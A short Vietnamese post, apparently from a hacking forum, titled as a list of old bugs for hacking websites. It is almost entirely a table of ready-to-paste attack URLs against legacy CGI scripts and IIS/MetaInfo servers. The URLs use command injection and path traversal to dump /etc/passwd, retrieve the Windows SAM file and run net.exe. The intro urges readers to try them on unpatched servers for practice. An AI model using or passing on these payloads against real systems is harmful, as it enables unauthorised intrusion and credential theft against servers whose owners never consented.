Vài bug cũ mà các bạn có thể dùng để hack website
Bug này cũ rồi nên có thể đã được patch , nhưng vẫn có server chưa patch và đó là cơ hội cho bạn thực tập
Bug :
Tên bug Đánh ở browser
campas.cgi http://IP//cgi-bin/campas?%0acat%0a/etc/passwd%0a
faxsurvey.cgi http://IP/cgi-bin/faxsurvery?/bin/cat%20/etc/passwd
IIS4 http://IP/scripts/iisadmin/ism.dll?http/dir
MetaInfo http://www.victim.com:5000/../../winnt/repair/sam
MetaInfo 2 http://www.victim.com:5000/../smusers.txt
MetaIP http://www.victim.com:5000/../../../winnt/repair/sam
MetaIP 2 http://www.victim.com:5000/../../winnt/system32/net.exe?use%20
nph-test.cgi http://IP/cgi-bin/nph-test.cgi?*
nph-test.cgi http://IP/cgi-bin/nph-test.cgi?/*
phf.cgi http://IP/cgi-bin/phf?Qalias=x%0a/bin/cat/%20/etc/passwd
php.cgi http://IP/cgi-bin/php.cgi?/etc/passwd
test-cgi http://IP/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
test-cgi 2 GET /cgi-bin/test-cgi?/*
webdist.cgi http://IP/webdist.cgi?distloc=;/bin/cat%20/etc/passwd